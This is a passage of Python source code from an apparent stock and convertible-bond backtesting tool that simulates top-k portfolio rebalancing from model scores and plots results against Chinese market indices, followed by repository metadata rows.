cur_merge_df=pd.merge(cur_df_all,cur_score_df, how='left', on=['trade_date','ts_code'])
cur_merge_df['mix_rank'].fillna(-99.99, inplace=True)
if len(last_cur_merge_df):
cur_merge_df=pd.merge(cur_merge_df,last_cur_merge_df, how='left', on=['ts_code'])
cur_merge_df['last_mix_rank'].fillna(-99.99, inplace=True)
#if cur_date>20180102 :
# cur_merge_df=cur_merge_df.to_csv("dsdf.csv")
code_value_sum=0
if codelist.shape[0]>0 :
codelist_buffer=pd.merge(codelist,cur_merge_df, how='left', on=['ts_code'])
#刷新停牌的close和adj价值
codelist_buffer['adj_factor'].fillna(9999.99, inplace=True)
codelist_buffer['close'].fillna(9999.99, inplace=True)
codelist_buffer['open'].fillna(9999.99, inplace=True)
codelist_buffer['control_state_open']=0
codelist_buffer['control_state_close']=0
codelist_buffer['stop_state']=0
codelist_buffer.loc[codelist_buffer['adj_factor']==9999.99,'stop_state']=1
codelist_buffer.loc[codelist_buffer['open']==codelist_buffer['down_limit'],'control_state_open']=1
codelist_buffer.loc[codelist_buffer['open']==codelist_buffer['up_limit'],'control_state_open']=2
codelist_buffer.loc[codelist_buffer['close']==codelist_buffer['down_limit'],'control_state_close']=1
codelist_buffer.loc[codelist_buffer['close']==codelist_buffer['up_limit'],'control_state_close']=2
codelist_buffer.loc[codelist_buffer['adj_factor']==9999.99,'adj_factor']=codelist_buffer['last_adj_factor']
codelist_buffer.loc[codelist_buffer['open']==9999.99,'open']=codelist_buffer['lastprice']
###更新除权
##print(codelist_buffer.head(10))
codelist_buffer.loc[:,'buy_amount']=codelist_buffer['buy_amount']*codelist_buffer['adj_factor']/codelist_buffer['last_adj_factor']
#codelist_buffer.loc[:,'last_adj_factor']=codelist_buffer['adj_factor']
#codelist_buffer.loc[:,'last_adj_factor']=codelist_buffer['adj_factor']
#print(codelist_buffer.head(10))
codelist.loc[:,'buy_amount']=codelist_buffer['buy_amount']
codelist.loc[:,'last_adj_factor']=codelist_buffer['adj_factor']
codelist.loc[:,'lastprice']=codelist_buffer['open']
codelist_buffer['value']=codelist_buffer['buy_amount']*codelist_buffer['open']
#codelist_buffer.reset_index(inplace=True,drop=True)
#code_value_sum=codelist_buffer['value'].sum()
#todo fillna
#pd.merge(df_all, df_long_all, how='inner', on=['ts_code','trade_date'])
#print(cur_merge_df)
#sell==========================
sellto=hold_all-change_num
sellnum=cur_hold_num-sellto
if sellnum>0:
#初始化本日卖出flag sell_value 每日刷新
#初始化本日卖出计数
codelist_buffer['sell_value']=0
#sell_count=0
#先看open是否为2,是则消除前日的卖出flag
#codelist_buffer.loc[codelist_buffer['control_state_open']==2,'last_action_flag']=0
#按open更新当日的sell_value,并且增加计数
#(前日卖出flag为1,当日open是1,当日close不是1,这种情况按score来算)
#see=codelist_buffer[codelist_buffer['last_action_flag']==1].shape[0]
#if(see>0):
# print(codelist_buffer)
#codelist_buffer.loc[(codelist_buffer['last_action_flag']==1)&(codelist_buffer['control_state_open']!=1),'sell_value']=codelist_buffer['open']*codelist_buffer['buy_amount']
#codelist_buffer.loc[(codelist_buffer['last_action_flag']==1)&(codelist_buffer['control_state_close']!=1),'sell_value']=codelist_buffer['open']*codelist_buffer['buy_amount']
#sell_count=codelist_buffer[codelist_buffer['sell_value']>0].shape[0]
#if(sell_count!=0):
# print(codelist_buffer)
#sellnum=sellnum-sell_count
#根据分数排序
codelist_buffer=codelist_buffer.sort_values(by=['last_mix_rank'])
#先将这些分数低的更新last_action_flag为1
codelist_buffer.loc[codelist_buffer['ts_code'].isin(codelist_buffer['ts_code'].head(sellnum)),'last_action_flag']=1
codelist.loc[codelist['ts_code'].isin(codelist_buffer['ts_code'].head(sellnum)),'last_action_flag']=1
#更新当日control_state_close不跌停的的sell_value
codelist_buffer.loc[(codelist_buffer['last_action_flag']==1)&(codelist_buffer['control_state_open']!=1),'sell_value']=codelist_buffer['value']
codelist_buffer.loc[(codelist_buffer['last_action_flag']==1)&(codelist_buffer['control_state_open']==1)&(codelist_buffer['control_state_close']!=1),'sell_value']=codelist_buffer['close']*codelist_buffer['buy_amount']
#排除跌停卖出
#统计所有的sell_value大于0的并drop掉更新list
account=account+codelist_buffer['sell_value'].sum()*Trans_cost
cur_hold_num-=codelist_buffer[codelist_buffer['sell_value']>0].shape[0]
#if(cur_hold_num!=80):
# print(codelist_buffer)
#codelist_buffer.drop(codelist_buffer['sell_value']>0,inplace=True)
codelist_buffer=codelist_buffer[codelist_buffer['sell_value']==0]
codelist=codelist[codelist['ts_code'].isin(codelist_buffer['ts_code'])]
sdfafa=1
#buy==========================
buyto=hold_all
buynum=buyto-cur_hold_num
if(buynum>0 and len(last_cur_merge_df)):
buy_all_value=0
if(codelist.shape[0]>0):
hold_code_sum=codelist_buffer['value'].sum()
buy_all_value=(account+hold_code_sum)*buy_pct-hold_code_sum
else:
buy_all_value=account*buy_pct
#when account too low then don't do anything
if(buy_all_value<10000):
continue
code_amount_buy=buy_all_value/buynum
cur_merge_df=cur_merge_df.sort_values(by=['last_mix_rank'])
buylist=cur_merge_df
#single code no repeat
buylist=buylist[~buylist['ts_code'].isin(codelist['ts_code'])]
#todo can't buy highstop
#buylist=buylist[buylist['pct_chg']<4]
buylist=buylist[buylist['open']!=buylist['up_limit']]
#buylist=buylist[buylist['pct_chg']>-9]
if choicepolicy=="random":
buylist = shuffle(buylist,random_state=4)
elif choicepolicy=="balance":
headnum=buynum/20+1
test=buylist.groupby('Shift_1total_mv_rank').tail(headnum)
#print(buylist)
buylist=test.sort_values(by=['last_mix_rank'])
#错误示范,预知未来
buylist=buylist[buylist['last_amount']>1500]
#buylist.to_csv("comp.csv")
#print(buylist)
buylist=buylist.tail(buynum)
buylist.loc[:,'buyuse']=code_amount_buy/buylist['open']
#buylist['buyuse']=code_amount_buy/buylist['close']
buylist.loc[:,'buyuse']=buylist['buyuse'].round(-2)
buylist.loc[:,'buyuse']=buylist['buyuse'].astype(int)
buylist['value']=buylist['open']*buylist['buyuse']
#seelist=buylist[['ts_code','trade_date','yesterday_1total_mv_rank']]
#print(seelist)
account=account-buylist['value'].sum()
#上日控制flag用于给后一日提供买卖信息,默认为0
buylist['last_action_flag']=0
savebuylist=buylist[['ts_code','open','buyuse','adj_factor','last_action_flag']]
savebuylist.columns = ['ts_code','lastprice','buy_amount','last_adj_factor','last_action_flag']
codelist=codelist.append(savebuylist)
#todo 这里因为下个循环drop会用到index如果不重新排序会造成问题,先这样改如果需要提升速度再进行修正
codelist.reset_index(inplace=True,drop=True)
cur_hold_num+=buynum
sdfafa=1
#print(codelist)
#codelist_buffer=pd.merge(codelist,cur_merge_df, how='left', on=['ts_code'])
bufferdf=codelist['buy_amount']*codelist['lastprice']
#if(cur_date>20171018):
# print(codelist)
#print(codelist)
code_value_sum=bufferdf.sum()
print(account+code_value_sum)
print(cur_date)
show3.append(account+code_value_sum)
last_cur_merge_df=cur_merge_df[["ts_code","mix_rank","amount"]]
last_cur_merge_df.columns =['ts_code','last_mix_rank','last_amount']
#print(last_cur_merge_df)
days+=1
days=np.arange(1,datelist.shape[0]+1)
eee=np.where(days%5==0)
daysshow=days[eee]
datashow=datelist[eee]
#a = np.random.rand(days.shape[0], 1)
#a=np.load('a.npy')
#a=a.tolist()
#print(a)
#plt.plot(days,a,c='red',label='CB')
if True :
#000001.SH 上证 000016.SH 50 000688.SH 科创50 000905.SH 中证500 399006.SZ 创业板指
#399300.SZ 300 000852.SH 1000
baselinecode='399300.SZ'
baseline1=self.display_baseline(datelist,accountbase,baselinecode)
plt.plot(days,baseline1,c='m',label=baselinecode)
baselinecode='399006.SZ'
baseline2=self.display_baseline(datelist,accountbase,baselinecode)
plt.plot(days,baseline2,c='c',label=baselinecode)
baselinecode='000852.SH'
baseline3=self.display_baseline(datelist,accountbase,baselinecode)
plt.plot(days,baseline3,c='y',label=baselinecode)
baselinecode='000905.SH'
baseline4=self.display_baseline(datelist,accountbase,baselinecode)
plt.plot(days,baseline4,c='k',label=baselinecode)
print(show3)
plt.plot(days,show3,c='green',label="TOPK_open_head30")
plt.xticks(daysshow, datashow,color='blue',rotation=60)
plt.legend()
plt.show()
input()
asdffd=1
def Topk_nextopen_mix(self,resultpath):
#df_all = pd.read_csv('./Database/Dailydata.csv',index_col=0,header=0)
#df_adj_all=pd.read_csv('./Database/Daily_adj_factor.csv',index_col=0,header=0)
#df_limit_all=pd.read_csv('./Database/Daily_stk_limit.csv',index_col=0,header=0)
df_all = pd.read_pickle('./Database/Dailydata.pkl')
df_adj_all = pd.read_pickle('./Database/Daily_adj_factor.pkl')
df_limit_all = pd.read_pickle('./Database/Daily_stk_limit.pkl')
df_all=pd.merge(df_all, df_adj_all, how='left', on=['ts_code','trade_date'])
df_all=pd.merge(df_all, df_limit_all, how='left', on=['ts_code','trade_date'])
score_df = pd.read_csv(resultpath,index_col=0,header=0)
#score_df=score_df[['ts_code','trade_date','mix']]
score_df=score_df[['ts_code','trade_date','mix','Shift_1total_mv_rank','close_show']]
#score_df = pd.read_csv('zzzzfackdatapred_fullold.csv',index_col=0,header=0)
#print(df_all)
print(score_df)
#hold_all=5
#change_num=1
hold_all=30
change_num=6
account=100000000
accountbase=account
buy_pct=0.9
Trans_cost=0.997 #千三
# balance random none
choicepolicy="random"
###添加停牌计算和涨跌停简单策略
#stop_state 当日不停牌为0,当日停牌为1 (TODO:前日停牌本日不停牌为2,不每日刷新),每日刷新
#control_state_open 当日不停牌且开盘未触及涨跌停为0,当日开盘触及跌停为1,当日开盘触及涨停为2,每日刷新
#control_state_close 当日不停牌且收盘没有触及涨跌停为0,当日收盘触及跌停1,当日收盘触及涨停为2,每日刷新
#last_action_flag 前日不需要买入卖出为0,前日需要卖出为1,前日需要买入为2
codelist=pd.DataFrame(columns=('ts_code','lastprice','buy_amount','last_adj_factor','last_action_flag'))
codelist_buffer=pd.DataFrame(columns=('ts_code','lastprice','buy_amount','last_adj_factor','last_action_flag'))
#codelist=codelist.append([{'ts_code':1,'lastprice':1,'amount':1,'adjflag':1}])
#print(codelist)
score_df=score_df.sort_values(by=['trade_date'])
datelist=score_df['trade_date'].unique()
cur_hold_num=0
print(datelist)
days=0
show3=[]
last_cur_merge_df=[]
for cur_date in datelist:
#这里注意停牌的不包含在这个list中
cur_df_all=df_all[df_all['trade_date'].isin([cur_date])]
cur_score_df=score_df[score_df['trade_date'].isin([cur_date])]
cur_merge_df=pd.merge(cur_df_all,cur_score_df, how='left', on=['trade_date','ts_code'])
cur_merge_df['mix'].fillna(-99.99, inplace=True)
if len(last_cur_merge_df):
cur_merge_df=pd.merge(cur_merge_df,last_cur_merge_df, how='left', on=['ts_code'])
cur_merge_df['last_mix'].fillna(-99.99, inplace=True)
#if cur_date>20180102 :
# cur_merge_df=cur_merge_df.to_csv("dsdf.csv")
code_value_sum=0
if codelist.shape[0]>0 :
codelist_buffer=pd.merge(codelist,cur_merge_df, how='left', on=['ts_code'])
#刷新停牌的close和adj价值
codelist_buffer['adj_factor'].fillna(9999.99, inplace=True)
codelist_buffer['close'].fillna(9999.99, inplace=True)
codelist_buffer['open'].fillna(9999.99, inplace=True)
codelist_buffer['control_state_open']=0
codelist_buffer['control_state_close']=0
codelist_buffer['stop_state']=0
codelist_buffer.loc[codelist_buffer['adj_factor']==9999.99,'stop_state']=1
codelist_buffer.loc[codelist_buffer['open']==codelist_buffer['down_limit'],'control_state_open']=1
codelist_buffer.loc[codelist_buffer['open']==codelist_buffer['up_limit'],'control_state_open']=2
codelist_buffer.loc[codelist_buffer['close']==codelist_buffer['down_limit'],'control_state_close']=1
codelist_buffer.loc[codelist_buffer['close']==codelist_buffer['up_limit'],'control_state_close']=2
codelist_buffer.loc[codelist_buffer['adj_factor']==9999.99,'adj_factor']=codelist_buffer['last_adj_factor']
codelist_buffer.loc[codelist_buffer['open']==9999.99,'open']=codelist_buffer['lastprice']
###更新除权
##print(codelist_buffer.head(10))
codelist_buffer.loc[:,'buy_amount']=codelist_buffer['buy_amount']*codelist_buffer['adj_factor']/codelist_buffer['last_adj_factor']
#codelist_buffer.loc[:,'last_adj_factor']=codelist_buffer['adj_factor']
#codelist_buffer.loc[:,'last_adj_factor']=codelist_buffer['adj_factor']
#print(codelist_buffer.head(10))
codelist.loc[:,'buy_amount']=codelist_buffer['buy_amount']
codelist.loc[:,'last_adj_factor']=codelist_buffer['adj_factor']
codelist.loc[:,'lastprice']=codelist_buffer['open']
codelist_buffer['value']=codelist_buffer['buy_amount']*codelist_buffer['open']
#codelist_buffer.reset_index(inplace=True,drop=True)
#code_value_sum=codelist_buffer['value'].sum()
#todo fillna
#pd.merge(df_all, df_long_all, how='inner', on=['ts_code','trade_date'])
#print(cur_merge_df)
#sell==========================
sellto=hold_all-change_num
sellnum=cur_hold_num-sellto
if sellnum>0:
#初始化本日卖出flag sell_value 每日刷新
#初始化本日卖出计数
codelist_buffer['sell_value']=0
#sell_count=0
#先看open是否为2,是则消除前日的卖出flag
#codelist_buffer.loc[codelist_buffer['control_state_open']==2,'last_action_flag']=0
#按open更新当日的sell_value,并且增加计数
#(前日卖出flag为1,当日open是1,当日close不是1,这种情况按score来算)
#see=codelist_buffer[codelist_buffer['last_action_flag']==1].shape[0]
#if(see>0):
# print(codelist_buffer)
#codelist_buffer.loc[(codelist_buffer['last_action_flag']==1)&(codelist_buffer['control_state_open']!=1),'sell_value']=codelist_buffer['open']*codelist_buffer['buy_amount']
#codelist_buffer.loc[(codelist_buffer['last_action_flag']==1)&(codelist_buffer['control_state_close']!=1),'sell_value']=codelist_buffer['open']*codelist_buffer['buy_amount']
#sell_count=codelist_buffer[codelist_buffer['sell_value']>0].shape[0]
#if(sell_count!=0):
# print(codelist_buffer)
#sellnum=sellnum-sell_count
#根据分数排序
codelist_buffer=codelist_buffer.sort_values(by=['last_mix'])
#先将这些分数低的更新last_action_flag为1
codelist_buffer.loc[codelist_buffer['ts_code'].isin(codelist_buffer['ts_code'].head(sellnum)),'last_action_flag']=1
codelist.loc[codelist['ts_code'].isin(codelist_buffer['ts_code'].head(sellnum)),'last_action_flag']=1
#更新当日control_state_close不跌停的的sell_value
codelist_buffer.loc[(codelist_buffer['last_action_flag']==1)&(codelist_buffer['control_state_open']!=1),'sell_value']=codelist_buffer['value']
codelist_buffer.loc[(codelist_buffer['last_action_flag']==1)&(codelist_buffer['control_state_open']==1)&(codelist_buffer['control_state_close']!=1),'sell_value']=codelist_buffer['close']*codelist_buffer['buy_amount']
#排除跌停卖出
#统计所有的sell_value大于0的并drop掉更新list
account=account+codelist_buffer['sell_value'].sum()*Trans_cost
cur_hold_num-=codelist_buffer[codelist_buffer['sell_value']>0].shape[0]
#if(cur_hold_num!=80):
# print(codelist_buffer)
#codelist_buffer.drop(codelist_buffer['sell_value']>0,inplace=True)
codelist_buffer=codelist_buffer[codelist_buffer['sell_value']==0]
codelist=codelist[codelist['ts_code'].isin(codelist_buffer['ts_code'])]
sdfafa=1
#buy==========================
buyto=hold_all
buynum=buyto-cur_hold_num
if(buynum>0 and len(last_cur_merge_df)):
buy_all_value=0
if(codelist.shape[0]>0):
hold_code_sum=codelist_buffer['value'].sum()
buy_all_value=(account+hold_code_sum)*buy_pct-hold_code_sum
else:
buy_all_value=account*buy_pct
#when account too low then don't do anything
if(buy_all_value<10000):
continue
code_amount_buy=buy_all_value/buynum
cur_merge_df=cur_merge_df.sort_values(by=['last_mix'])
buylist=cur_merge_df
#single code no repeat
buylist=buylist[~buylist['ts_code'].isin(codelist['ts_code'])]
#todo can't buy highstop
#buylist=buylist[buylist['pct_chg']<4]
buylist=buylist[buylist['open']!=buylist['up_limit']]
#buylist=buylist[buylist['pct_chg']>-9]
if choicepolicy=="random":
buylist = shuffle(buylist,random_state=4)
elif choicepolicy=="balance":
headnum=buynum/20+1
test=buylist.groupby('Shift_1total_mv_rank').tail(headnum)
#print(test)
buylist=test.sort_values(by=['last_mix'])
buylist=buylist.tail(buynum)
buylist.loc[:,'buyuse']=code_amount_buy/buylist['open']
#buylist['buyuse']=code_amount_buy/buylist['close']
buylist.loc[:,'buyuse']=buylist['buyuse'].round(-2)
buylist.loc[:,'buyuse']=buylist['buyuse'].astype(int)
buylist['value']=buylist['open']*buylist['buyuse']
#seelist=buylist[['ts_code','trade_date','yesterday_1total_mv_rank']]
#print(seelist)
account=account-buylist['value'].sum()
#上日控制flag用于给后一日提供买卖信息,默认为0
buylist['last_action_flag']=0
savebuylist=buylist[['ts_code','open','buyuse','adj_factor','last_action_flag']]
savebuylist.columns = ['ts_code','lastprice','buy_amount','last_adj_factor','last_action_flag']
codelist=codelist.append(savebuylist)
#todo 这里因为下个循环drop会用到index如果不重新排序会造成问题,先这样改如果需要提升速度再进行修正
codelist.reset_index(inplace=True,drop=True)
cur_hold_num+=buynum
sdfafa=1
#print(codelist)
#codelist_buffer=pd.merge(codelist,cur_merge_df, how='left', on=['ts_code'])
bufferdf=codelist['buy_amount']*codelist['lastprice']
#if(cur_date>20171018):
# print(codelist)
#print(codelist)
code_value_sum=bufferdf.sum()
print(account+code_value_sum)
print(cur_date)
show3.append(account+code_value_sum)
last_cur_merge_df=cur_merge_df[["ts_code","mix"]]
last_cur_merge_df.columns =['ts_code','last_mix']
#print(last_cur_merge_df)
days+=1
days=np.arange(1,datelist.shape[0]+1)
eee=np.where(days%5==0)
daysshow=days[eee]
datashow=datelist[eee]
#a = np.random.rand(days.shape[0], 1)
if True :
#000001.SH 上证 000016.SH 50 000688.SH 科创50 000905.SH 中证500 399006.SZ 创业板指
#399300.SZ 300 000852.SH 1000
baselinecode='399300.SZ'
baseline1=self.display_baseline(datelist,accountbase,baselinecode)
plt.plot(days,baseline1,c='m',label=baselinecode)
baselinecode='399006.SZ'
baseline2=self.display_baseline(datelist,accountbase,baselinecode)
plt.plot(days,baseline2,c='c',label=baselinecode)
baselinecode='000852.SH'
baseline3=self.display_baseline(datelist,accountbase,baselinecode)
plt.plot(days,baseline3,c='y',label=baselinecode)
baselinecode='000905.SH'
baseline4=self.display_baseline(datelist,accountbase,baselinecode)
plt.plot(days,baseline4,c='k',label=baselinecode)
print(show3)
plt.plot(days,show3,c='green',label="TOPK_open_head30")
plt.xticks(daysshow, datashow,color='blue',rotation=60)
plt.legend()
plt.show()
input()
asdffd=1
def Topk_nextopen_CB(self,resultpath):
#修改显示行列数
pd.set_option('display.width', 5000)
pd.set_option('display.max_rows', 500)
pd.set_option('display.max_columns', 500)
df_all = pd.read_pickle('./Database/CBDaily.pkl')
df_all=df_all[df_all["open"]!=0]
df_all.reset_index(inplace=True,drop=True)
score_df = pd.read_csv(resultpath,index_col=0,header=0)
score_df=score_df[['ts_code','trade_date','mix_rank','close_show']]
print(score_df)
#hold_all=5
#change_num=1
hold_all=10
change_num=2
account=100000000
accountbase=account
buy_pct=0.9
Trans_cost=0.9997 #千三
# balance random none small
choicepolicy="small"
###添加停牌计算和涨跌停简单策略
#stop_state 当日不停牌为0,当日停牌为1 (TODO:前日停牌本日不停牌为2,不每日刷新),每日刷新
#control_state_open 当日不停牌且开盘未触及涨跌停为0,当日开盘触及跌停为1,当日开盘触及涨停为2,每日刷新
#control_state_close 当日不停牌且收盘没有触及涨跌停为0,当日收盘触及跌停1,当日收盘触及涨停为2,每日刷新
#last_action_flag 前日不需要买入卖出为0,前日需要卖出为1,前日需要买入为2
codelist=pd.DataFrame(columns=('ts_code','lastprice','buy_amount','last_action_flag'))
codelist_buffer=pd.DataFrame(columns=('ts_code','lastprice','buy_amount','last_action_flag'))
#codelist=codelist.append([{'ts_code':1,'lastprice':1,'amount':1,'adjflag':1}])
#print(codelist)
score_df=score_df.sort_values(by=['trade_date'])
datelist=score_df['trade_date'].unique()
cur_hold_num=0
print(datelist)
days=0
show3=[]
last_cur_merge_df=[]
for cur_date in datelist:
#这里注意停牌的不包含在这个list中
cur_df_all=df_all[df_all['trade_date'].isin([cur_date])]
cur_score_df=score_df[score_df['trade_date'].isin([cur_date])]
cur_merge_df=pd.merge(cur_df_all,cur_score_df, how='left', on=['trade_date','ts_code'])
cur_merge_df['mix_rank'].fillna(-99.99, inplace=True)
if len(last_cur_merge_df):
cur_merge_df=pd.merge(cur_merge_df,last_cur_merge_df, how='left', on=['ts_code'])
cur_merge_df['last_mix_rank'].fillna(-99.99, inplace=True)
#if cur_date>20180102 :
# cur_merge_df=cur_merge_df.to_csv("dsdf.csv")
code_value_sum=0
if codelist.shape[0]>0 :
codelist_buffer=pd.merge(codelist,cur_merge_df, how='left', on=['ts_code'])
#刷新停牌的close和adj价值
codelist_buffer['close'].fillna(9999.99, inplace=True)
codelist_buffer['open'].fillna(9999.99, inplace=True)
codelist_buffer['control_state_open']=0
codelist_buffer['control_state_close']=0
codelist_buffer['stop_state']=0
codelist_buffer.loc[codelist_buffer['open']==9999.99,'stop_state']=1
#codelist_buffer.loc[codelist_buffer['open']==codelist_buffer['down_limit'],'control_state_open']=1
#codelist_buffer.loc[codelist_buffer['open']==codelist_buffer['up_limit'],'control_state_open']=2
#codelist_buffer.loc[codelist_buffer['close']==codelist_buffer['down_limit'],'control_state_close']=1
#codelist_buffer.loc[codelist_buffer['close']==codelist_buffer['up_limit'],'control_state_close']=2
#codelist_buffer.loc[codelist_buffer['adj_factor']==9999.99,'adj_factor']=codelist_buffer['last_adj_factor']
codelist_buffer.loc[codelist_buffer['open']==9999.99,'open']=codelist_buffer['lastprice']
###更新除权
##print(codelist_buffer.head(10))
#codelist_buffer.loc[:,'buy_amount']=codelist_buffer['buy_amount']
#codelist_buffer.loc[:,'last_adj_factor']=codelist_buffer['adj_factor']
#codelist_buffer.loc[:,'last_adj_factor']=codelist_buffer['adj_factor']
#print(codelist_buffer.head(10))
codelist.loc[:,'buy_amount']=codelist_buffer['buy_amount']
#codelist.loc[:,'last_adj_factor']=codelist_buffer['adj_factor']
codelist.loc[:,'lastprice']=codelist_buffer['open']
codelist_buffer['value']=codelist_buffer['buy_amount']*codelist_buffer['open']
#codelist_buffer.reset_index(inplace=True,drop=True)
#code_value_sum=codelist_buffer['value'].sum()
#todo fillna
#pd.merge(df_all, df_long_all, how='inner', on=['ts_code','trade_date'])
#print(cur_merge_df)
#sell==========================
sellto=hold_all-change_num
sellnum=cur_hold_num-sellto
if sellnum>0:
#初始化本日卖出flag sell_value 每日刷新
#初始化本日卖出计数
codelist_buffer['sell_value']=0
#sell_count=0
#先看open是否为2,是则消除前日的卖出flag
#codelist_buffer.loc[codelist_buffer['control_state_open']==2,'last_action_flag']=0
#按open更新当日的sell_value,并且增加计数
#(前日卖出flag为1,当日open是1,当日close不是1,这种情况按score来算)
#see=codelist_buffer[codelist_buffer['last_action_flag']==1].shape[0]
#if(see>0):
# print(codelist_buffer)
#codelist_buffer.loc[(codelist_buffer['last_action_flag']==1)&(codelist_buffer['control_state_open']!=1),'sell_value']=codelist_buffer['open']*codelist_buffer['buy_amount']
#codelist_buffer.loc[(codelist_buffer['last_action_flag']==1)&(codelist_buffer['control_state_close']!=1),'sell_value']=codelist_buffer['open']*codelist_buffer['buy_amount']
#sell_count=codelist_buffer[codelist_buffer['sell_value']>0].shape[0]
#if(sell_count!=0):
# print(codelist_buffer)
#sellnum=sellnum-sell_count
#根据分数排序
codelist_buffer=codelist_buffer.sort_values(by=['last_mix_rank'])
#print(codelist_buffer)
#先将这些分数低的更新last_action_flag为1
codelist_buffer.loc[codelist_buffer['ts_code'].isin(codelist_buffer['ts_code'].head(sellnum)),'last_action_flag']=1
codelist.loc[codelist['ts_code'].isin(codelist_buffer['ts_code'].head(sellnum)),'last_action_flag']=1
#更新当日control_state_close不跌停的的sell_value
codelist_buffer.loc[(codelist_buffer['last_action_flag']==1)&(codelist_buffer['control_state_open']!=1),'sell_value']=codelist_buffer['value']
codelist_buffer.loc[(codelist_buffer['stop_state']==1),'sell_value']=codelist_buffer['value']
#排除跌停卖出
#统计所有的sell_value大于0的并drop掉更新list
account=account+codelist_buffer['sell_value'].sum()*Trans_cost
cur_hold_num-=codelist_buffer[codelist_buffer['sell_value']>0].shape[0]
#if(cur_hold_num!=80):
# print(codelist_buffer)
#codelist_buffer.drop(codelist_buffer['sell_value']>0,inplace=True)
codelist_buffer=codelist_buffer[codelist_buffer['sell_value']==0]
codelist=codelist[codelist['ts_code'].isin(codelist_buffer['ts_code'])]
sdfafa=1
#buy==========================
buyto=hold_all
buynum=buyto-cur_hold_num
if(buynum>0 and len(last_cur_merge_df)):
buy_all_value=0
if(codelist.shape[0]>0):
hold_code_sum=codelist_buffer['value'].sum()
buy_all_value=(account+hold_code_sum)*buy_pct-hold_code_sum
else:
buy_all_value=account*buy_pct
#when account too low then don't do anything
if(buy_all_value<10000):
continue
code_amount_buy=buy_all_value/buynum
#cur_merge_df=cur_merge_df.sort_values(by=['last_mix_rank'])
buylist=cur_merge_df
#single code no repeat
buylist=buylist[~buylist['ts_code'].isin(codelist['ts_code'])]
#buylist=buylist[buylist['pct_chg']<4]
#buylist=buylist[buylist['open']!=buylist['up_limit']]
#buylist=buylist[buylist['pct_chg']>-9]
if choicepolicy=="random":
buylist=buylist[buylist['last_amount']>1000]
buylist=buylist[buylist['last_close']<120]
#buylist = buylist[buylist['amount']>2000]
buylist = shuffle(buylist,random_state=12)
if choicepolicy=="small":
pass
#print(buylist)
buylist=buylist[buylist['last_amount']>1500]
buylist=buylist[buylist['last_close']<120]
#buylist = buylist[buylist['open']<120]
#buylist['amount_rank']=buylist['amount'].rank(pct=True)
#buylist = buylist[buylist['amount_rank']>0.9]
#buylist = buylist[buylist['amount']>5000]
buylist=buylist.sort_values(by=['last_mix_rank'])
#print(buylist)
#print(buylist)
buylist=buylist.tail(buynum)
buylist.loc[:,'buyuse']=code_amount_buy/buylist['open']
#buylist['buyuse']=code_amount_buy/buylist['close']
buylist.loc[:,'buyuse']=buylist['buyuse'].round(-2)
buylist.loc[:,'buyuse']=buylist['buyuse'].astype(int)
buylist['value']=buylist['open']*buylist['buyuse']
#seelist=buylist[['ts_code','trade_date','yesterday_1total_mv_rank']]
#print(seelist)
account=account-buylist['value'].sum()
#上日控制flag用于给后一日提供买卖信息,默认为0
buylist['last_action_flag']=0
savebuylist=buylist[['ts_code','open','buyuse','last_action_flag']]
savebuylist.columns = ['ts_code','lastprice','buy_amount','last_action_flag']
codelist=codelist.append(savebuylist)
#todo 这里因为下个循环drop会用到index如果不重新排序会造成问题,先这样改如果需要提升速度再进行修正
codelist.reset_index(inplace=True,drop=True)
cur_hold_num+=buynum
sdfafa=1
#print(codelist)
#codelist_buffer=pd.merge(codelist,cur_merge_df, how='left', on=['ts_code'])
bufferdf=codelist['buy_amount']*codelist['lastprice']
if(cur_date>20200805):
pass
#print(codelist)
#print(codelist)
code_value_sum=bufferdf.sum()
print(account+code_value_sum)
print(cur_date)
show3.append(account+code_value_sum)
last_cur_merge_df=cur_merge_df[["ts_code","mix_rank","amount","close"]]
last_cur_merge_df.columns =['ts_code','last_mix_rank','last_amount',"last_close"]
#print(last_cur_merge_df)
days+=1
days=np.arange(1,datelist.shape[0]+1)
eee=np.where(days%5==0)
daysshow=days[eee]
datashow=datelist[eee]
#a = np.random.rand(days.shape[0], 1)
#a=np.array(show3)
#np.save('a.npy',a) # 保存为.npy格式
#a=np.load('a.npy')
#a=a.tolist()
#print(a)
#plt.plot(days,a,c='red',label='CB')
if True :
#000001.SH 上证 000016.SH 50 000688.SH 科创50 000905.SH 中证500 399006.SZ 创业板指
#399300.SZ 300 000852.SH 1000
baselinecode='399300.SZ'
baseline1=self.display_baseline(datelist,accountbase,baselinecode)
plt.plot(days,baseline1,c='m',label=baselinecode)
baselinecode='399006.SZ'
baseline2=self.display_baseline(datelist,accountbase,baselinecode)
plt.plot(days,baseline2,c='c',label=baselinecode)
baselinecode='000852.SH'
baseline3=self.display_baseline(datelist,accountbase,baselinecode)
plt.plot(days,baseline3,c='y',label=baselinecode)
baselinecode='000905.SH'
baseline4=self.display_baseline(datelist,accountbase,baselinecode)
plt.plot(days,baseline4,c='k',label=baselinecode)
print(show3)
plt.plot(days,show3,c='green',label="TOPK_open_CB")
plt.xticks(daysshow, datashow,color='blue',rotation=60)
plt.legend()
plt.show()
input()
asdffd=1
def display_baseline(self,datelist,accountbase,basecode='399300.SZ'):
if(True):
CSZLData.CSZLDataWithoutDate.get_baseline(basecode)
index_name=basecode
index_path='./Database/indexdata/'+index_name+'.csv'
index_baseline=pd.read_csv(index_path,index_col=0,header=0)
index_use=index_baseline[['trade_date','close']]
index_use.sort_values(by=['trade_date'],ascending=True, inplace=True)
index_use=index_use[index_use['trade_date'].isin(datelist)]
basepoint=index_use['close'].values[0]
index_use['close']=index_use['close']*accountbase/basepoint
return index_use['close']
| 41.434644
| 232
| 0.600821
| 4,528
| 38,990
| 4.871025
| 0.066917
| 0.173921
| 0.028564
| 0.044206
| 0.952711
| 0.946591
| 0.941966
| 0.934258
| 0.934077
| 0.927639
| 0
| 0.031032
| 0.266915
| 38,990
| 941
| 233
| 41.434644
| 0.740615
| 0.257861
| 0
| 0.847981
| 0
| 0
| 0.137753
| 0.007432
| 0
| 0
| 0
| 0.001063
| 0
| 1
| 0.009501
| false
| 0.004751
| 0.014252
| 0
| 0.028504
| 0.035629
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
659ea91356929f022302c5c496e090adddcab540
| 4,299
|
py
|
Python
|
Source/CIFAR/utils.py
|
Theonik/Convnet-demo
|
ba80f65826cca9485c04ac6322bc752232a8b1b6
|
[
"Apache-2.0"
] | null | null | null |
